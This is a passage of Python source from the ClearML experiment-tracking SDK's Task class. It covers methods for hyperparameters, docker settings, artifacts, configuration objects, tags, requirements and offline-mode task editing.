params_types = kwargs.pop('__parameters_types', None) or dict()
update = kwargs.pop('__update', False)
# new parameters dict
new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
new_parameters.update(kwargs)
if prefix:
prefix = prefix.strip('/')
new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items())
# verify parameters type:
not_allowed = {
k: type(v).__name__
for k, v in new_parameters.items()
if not verify_basic_type(v, self._parameters_allowed_types)
}
if not_allowed:
self.log.warning(
"Skipping parameter: {}, only builtin types are supported ({})".format(
', '.join('%s[%s]' % p for p in not_allowed.items()),
', '.join(t.__name__ for t in self._parameters_allowed_types))
)
new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed}
use_hyperparams = Session.check_min_api_version('2.9')
with self._edit_lock:
self.reload()
# if we have a specific prefix and we use hyperparameters, and we use set.
# overwrite only the prefix, leave the rest as is.
if not update and prefix:
parameters = copy(self.get_parameters() or {})
parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/'))
elif update:
parameters = copy(self.get_parameters() or {})
else:
parameters = dict()
parameters.update(new_parameters)
if use_hyperparams:
# build nested dict from flat parameters dict:
org_hyperparams = self.data.hyperparams or {}
hyperparams = dict()
# if the task is a legacy task, we should put everything back under Args/key with legacy type
legacy_name = self._legacy_parameters_section_name
org_legacy_section = org_hyperparams.get(legacy_name, dict())
for k, v in parameters.items():
# legacy variable
if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy':
section = hyperparams.get(legacy_name, dict())
section[k] = copy(org_legacy_section[k])
section[k].value = stringify(v)
description = descriptions.get(k)
if description:
section[k].description = description
hyperparams[legacy_name] = section
continue
org_k = k
if '/' not in k:
k = '{}/{}'.format(self._default_configuration_section_name, k)
section_name, key = k.split('/', 1)
section = hyperparams.get(section_name, dict())
org_param = org_hyperparams.get(section_name, dict()).get(key, None)
param_type = params_types[org_k] if org_k in params_types else (
org_param.type if org_param is not None else type(v) if v is not None else None
)
if param_type and not isinstance(param_type, str):
param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type)
section[key] = tasks.ParamsItem(
section=section_name, name=key,
value=stringify(v),
description=descriptions[org_k] if org_k in descriptions else (
org_param.description if org_param is not None else None
),
type=param_type,
)
hyperparams[section_name] = section
self._edit(hyperparams=hyperparams)
self.data.hyperparams = hyperparams
else:
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: stringify(v) for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None, value_type=None):
# type: (str, str, Optional[str], Optional[Any]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
:param value_type: The type of the parameters (cast to string and store)
"""
if not Session.check_min_api_version('2.9'):
# not supported yet
description = None
value_type = None
self._set_parameters(
{name: value}, __update=True,
__parameters_descriptions={name: description},
__parameters_types={name: value_type}
)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def delete_parameter(self, name):
# type: (str) -> bool
"""
Delete a parameter byt it's full name Section/name.
:param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size'
:return: True if the parameter was deleted successfully
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Delete hyper-parameter is not supported by your clearml-server, "
"upgrade to the latest version")
with self._edit_lock:
paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1])
res = self.send(tasks.DeleteHyperParamsRequest(
task=self.id, hyperparams=[paramkey]), raise_on_errors=False)
self.reload()
return res.ok()
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self._set_parameters(*args, __update=True, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists() and not DOCKER_BASH_SETUP_ENV_VAR.exists():
return
self.set_base_docker(
docker_cmd=DOCKER_IMAGE_ENV_VAR.get(default=""),
docker_setup_bash_script=DOCKER_BASH_SETUP_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd, docker_arguments=None, docker_setup_bash_script=None):
# type: (str, Optional[Union[str, Sequence[str]]], Optional[Union[str, Sequence[str]]]) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely the call is ignored
:param docker_cmd: docker container image (example: 'nvidia/cuda:11.1')
:param docker_arguments: docker execution parameters (example: '-e ENV=1')
:param docker_setup_bash_script: bash script to run at the
beginning of the docker before launching the Task itself. example: ['apt update', 'apt-get install -y gcc']
"""
image = docker_cmd.split(' ')[0] if docker_cmd else ''
if not docker_arguments and docker_cmd:
docker_arguments = docker_cmd.split(' ')[1:] if len(docker_cmd.split(' ')) > 1 else ''
arguments = (docker_arguments if isinstance(docker_arguments, str) else ' '.join(docker_arguments)) \
if docker_arguments else ''
if docker_setup_bash_script:
setup_shell_script = docker_setup_bash_script \
if isinstance(docker_setup_bash_script, str) else '\n'.join(docker_setup_bash_script)
else:
setup_shell_script = ''
with self._edit_lock:
self.reload()
if Session.check_min_api_version("2.13"):
self.data.container = dict(image=image, arguments=arguments, setup_shell_script=setup_shell_script)
self._edit(container=self.data.container)
else:
if setup_shell_script:
raise ValueError(
"Your ClearML-server does not support docker bash script feature, please upgrade.")
execution = self.data.execution
execution.docker_cmd = image + (' {}'.format(arguments) if arguments else '')
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
if Session.check_min_api_version("2.13"):
# backwards compatibility
container = self._get_task_property(
"container", raise_on_error=False, log_on_error=False, default={})
return (container.get('image', '') +
(' {}'.format(container['arguments']) if container.get('arguments', '') else '')) or None
else:
return self._get_task_property("execution.docker_cmd", raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts or None if error.
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return execution.artifacts or []
def _add_artifacts(self, artifacts_list):
# type: (Sequence[tasks.Artifact]) -> Optional[List[tasks.Artifact]]
"""
List of artifacts (tasks.Artifact) to add to the the task
If an artifact by the same name already exists it will overwrite the existing artifact.
:param list artifacts_list: list of artifacts (type tasks.Artifact)
:return: List of current Task's Artifacts
"""
if not Session.check_min_api_version('2.3'):
return None
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts as List[tasks.Artifact]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.AddOrUpdateArtifactsRequest(task=self.task_id, artifacts=artifacts_list, force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.updated:
return None
self.reload()
else:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _delete_artifacts(self, artifact_names):
# type: (Sequence[str]) -> bool
"""
Delete a list of artifacts, by artifact name, from the Task.
:param list artifact_names: list of artifact names
:return: True if successful
"""
if not Session.check_min_api_version('2.3'):
return False
if not isinstance(artifact_names, (list, tuple)):
raise ValueError('Expected artifact names as List[str]')
with self._edit_lock:
if Session.check_min_api_version("2.13") and not self._offline_mode:
req = tasks.DeleteArtifactsRequest(
task=self.task_id, artifacts=[{"key": n, "mode": "output"} for n in artifact_names], force=True)
res = self.send(req, raise_on_errors=False)
if not res or not res.response or not res.response.deleted:
return False
self.reload()
else:
self.reload()
execution = self.data.execution
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in artifact_names]
self._edit(execution=execution)
return self.data.execution.artifacts or []
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
if Session.check_min_api_version('2.9'):
configuration = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
configuration[self._default_configuration_section_name] = tasks.ConfigurationItem(
name=self._default_configuration_section_name, value=str(design))
self._edit(configuration=configuration)
else:
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as blob of text.
:return: The model configuration as blob of text.
"""
if Session.check_min_api_version('2.9'):
design = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
if design:
design = design.get(sorted(design.keys())[0]).value or ''
else:
design = self._get_task_property(
"execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id=None, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
# if running remotely and we are the main task, skip setting ourselves.
if self._is_remote_main_task():
return
if not project_id:
assert isinstance(project_name, six.string_types)
res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False)
if not res or not res.response or not res.response.projects or len(res.response.projects) != 1:
return False
project_id = res.response.projects[0].id
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
tags = list(set(tags))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
name = name or ''
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.id
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
comment = comment or ''
self._set_task_property("comment", str(comment))
self._edit(comment=str(comment))
def set_task_type(self, task_type):
# type: (Union[str, Task.TaskTypes]) -> ()
"""
Set the task_type for the Task.
:param task_type: The task_type of the Task (see optional values in TaskTypes).
:type task_type: str or TaskTypes
"""
if not isinstance(task_type, self.TaskTypes):
task_type = self.TaskTypes(task_type)
self._set_task_property("task_type", str(task_type))
self._edit(type=task_type)
def set_archived(self, archive):
# type: (bool) -> ()
"""
Archive the Task or remove it from the archived folder.
:param archive: If True archive the Task, If False make sure it is removed from the archived folder
"""
with self._edit_lock:
system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \
if archive else list(set(self.get_system_tags()) - {self.archived_tag})
self.set_system_tags(system_tags)
def get_archived(self):
# type: () -> bool
"""
Return the Archive state of the Task
:return: If True the Task is archived, otherwise it is not.
"""
return self.archived_tag in self.get_system_tags()
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
..code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return The task status without refreshing the entire Task object object (only the status property)
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars.
With sample limit, average scalar values inside sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_plots(
self,
max_iterations=None
):
# type: (...) -> List[dict]
"""
Return a list of all the plots reported for this Task,
Notice the plot data is plotly compatible.
.. note::
This call is not cached, any call will retrieve all the plot reports from the back-end.
If the Task has many plots reported, it might take long for the call to return.
Example:
.. code-block:: py
[{
'timestamp': 1636921296370,
'type': 'plot',
'task': '0ce5e89bbe484f428e43e767f1e2bb11',
'iter': 0,
'metric': 'Manual Reporting',
'variant': 'Just a plot',
'plot_str': '{"data": [{"type": "scatter", "mode": "markers", "name": null,
"x": [0.2620246750155817], "y": [0.2620246750155817]}]}',
'@timestamp': '2021-11-14T20:21:42.387Z',
'worker': 'machine-ml',
'plot_len': 6135,
},]
:param int max_iterations: Maximum number of historic plots (iterations from end) to return.
:return: list: List of dicts, each one represents a single plot
"""
# send request
res = self.send(
events.GetTaskPlotsRequest(task=self.id, iters=max_iterations or 1),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return []
response = res.wait()
if not response.ok() or not response.response_data:
return []
return response.response_data.get('plots', [])
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
if Session.check_min_api_version('2.9'):
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
navigate_earlier=True,
batch_size=number_of_reports)
else:
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports)
res = self.send(request)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
def get_configuration_object(self, name):
# type: (str) -> Optional[str]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a text blob (unconstrained text string)
return None if configuration name is not valid
"""
return self._get_configuration_text(name)
def get_configuration_object_as_dict(self, name):
# type: (str) -> Optional[Union[dict, list]]
"""
Get the Task's configuration object section as parsed dictionary
Parsing supports JSON and HOCON, otherwise parse manually with `get_configuration_object()`
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a parsed dict.
return None if configuration name is not valid
"""
return self._get_configuration_dict(name)
def get_configuration_objects(self):
# type: () -> Optional[Mapping[str, str]]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:return: The Task's configurations as a
dict (config name as key) and text blob as value (unconstrained text string)
"""
if not Session.check_min_api_version('2.9'):
raise ValueError(
"Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
return {k: v.value for k, v in configuration.items()}
def set_configuration_object(self, name, config_text=None, description=None, config_type=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[dict, list]]) -> None
"""
Set the Task's configuration object as a blob of text or automatically encoded dictionary/list.
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:param config_text: configuration as a blob of text (unconstrained text string)
usually the content of a configuration file of a sort
:param str description: Configuration section description
:param str config_type: Optional configuration format type
:param dict config_dict: configuration dictionary/list to be encoded using HOCON (json alike) into stored text
Notice you can either pass `config_text` or `config_dict`, not both
"""
return self._set_configuration(
name=name, description=description, config_type=config_type,
config_text=config_text, config_dict=config_dict)
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@classmethod
def get_project_id(cls, project_name):
# type: (str) -> Optional[str]
"""
Return a project's unique ID (str).
If more than one project matched the project_name, return the last updated project
If no project matched the requested name, returns None
:return: Project unique ID (str), or None if no project was found.
"""
assert project_name
assert isinstance(project_name, str)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)),
raise_on_errors=False)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()).id for p in res.response.projects][0]
return None
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``clearml-agent`` is not executing it)
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> None
"""
Force the adding of a package to the requirements list. If ``package_version`` is None, use the
installed package version, if found.
Example: Task.add_requirements('tensorflow', '2.4.0')
Example: Task.add_requirements('tensorflow', '>=2.4')
Example: Task.add_requirements('tensorflow') -> use the installed tensorflow version
Example: Task.add_requirements('tensorflow', '') -> no version limit
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.add_requirements() must be called before Task.init()')
cls._force_requirements[str(package_name)] = package_version
@classmethod
def ignore_requirements(cls, package_name):
# type: (str) -> None
"""
Ignore a specific package when auto generating the requirements list.
Example: Task.ignore_requirements('pywin32')
:param str package_name: The package name to remove/ignore from the "Installed Packages" section of the task.
"""
if not running_remotely() and hasattr(cls, 'current_task') and cls.current_task():
get_logger('task').warning(
'Requirement ignored, Task.ignore_requirements() must be called before Task.init()')
cls._ignore_requirements.add(str(package_name))
@classmethod
def force_requirements_env_freeze(cls, force=True, requirements_file=None):
# type: (bool, Optional[Union[str, Path]]) -> None
"""
Force using `pip freeze` / `conda list` to store the full requirements of the active environment
(instead of statically analyzing the running code and listing directly imported packages)
Notice: Must be called before `Task.init` !
:param force: Set force using `pip freeze` flag on/off
:param requirements_file: Optional pass requirements.txt file to use
(instead of `pip freeze` or automatic analysis)
"""
cls._force_use_pip_freeze = requirements_file if requirements_file else bool(force)
@classmethod
def force_store_standalone_script(cls, force=True):
# type: (bool) -> None
"""
Force using storing the main python file as a single standalone script, instead of linking with the
local git repository/commit ID.
Notice: Must be called before `Task.init` !
:param force: Set force using `pip freeze` flag on/off
"""
cls._force_store_standalone_script = bool(force)
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _get_last_update(self):
# type: () -> (Optional[datetime])
if self._offline_mode:
return None
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_update']),
).response.tasks
return all_tasks[0].last_update
except Exception:
return None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _set_runtime_properties(self, runtime_properties):
# type: (Mapping[str, str]) -> bool
if not Session.check_min_api_version('2.13') or not runtime_properties:
return False
with self._edit_lock:
self.reload()
current_runtime_properties = self.data.runtime or {}
current_runtime_properties.update(runtime_properties)
# noinspection PyProtectedMember
self._edit(runtime=current_runtime_properties)
return True
def _get_runtime_properties(self):
# type: () -> Mapping[str, str]
if not Session.check_min_api_version('2.13'):
return dict()
return dict(**self.data.runtime) if self.data.runtime else dict()
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
if Session.check_min_api_version("2.13"):
self._data.models = tasks.TaskModels(input=[], output=[])
self._data.container = dict()
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.13'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict(),
container=self._data.container, models=self._data.models)
elif Session.check_min_api_version('2.9'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict())
elif Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _is_remote_main_task(self):
# type: () -> bool
"""
:return: return True if running remotely and this Task is the registered main task
"""
return running_remotely() and get_remote_task_id() == self.id
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we ae using forced update, make sure he task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags', 'runtime') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# make sure we have str as values:
for key in requirements.keys():
if requirements[key] and not isinstance(requirements[key], str):
requirements[key] = '\n'.join(requirements[key])
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[Mapping, list]]) -> None
"""
Set Task configuration text/dict. Multiple configurations are supported.
:param str name: Configuration name.
:param str description: Configuration section description.
:param str config_type: Optional configuration format type (str).
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# make sure we have wither dict or text
mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True)
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
if description:
description = str(description)
# support empty string
a_config = config_dict_to_text(config_dict if config_text is None else config_text)
with self._edit_lock:
self.reload()
configuration = self.data.configuration or {}
configuration[name] = tasks.ConfigurationItem(
name=name, value=a_config, description=description or None, type=config_type or None)
self._edit(configuration=configuration)
def _get_configuration_text(self, name):
# type: (str) -> Optional[str]
"""
Get Task configuration section as text
:param str name: Configuration name.
:return: The Task configuration as text (unconstrained text string).
return None if configuration name is not valid.
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
if not configuration.get(name):
return None
return configuration[name].value
def _get_configuration_dict(self, name):
# type: (str) -> Optional[dict]
"""
Get Task configuration section as dictionary
:param str name: Configuration name.
:return: The Task configuration as dictionary.
return None if configuration name is not valid.
"""
config_text = self._get_configuration_text(name)
if not config_text:
return None
return text_to_config_dict(config_text)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New for the new task
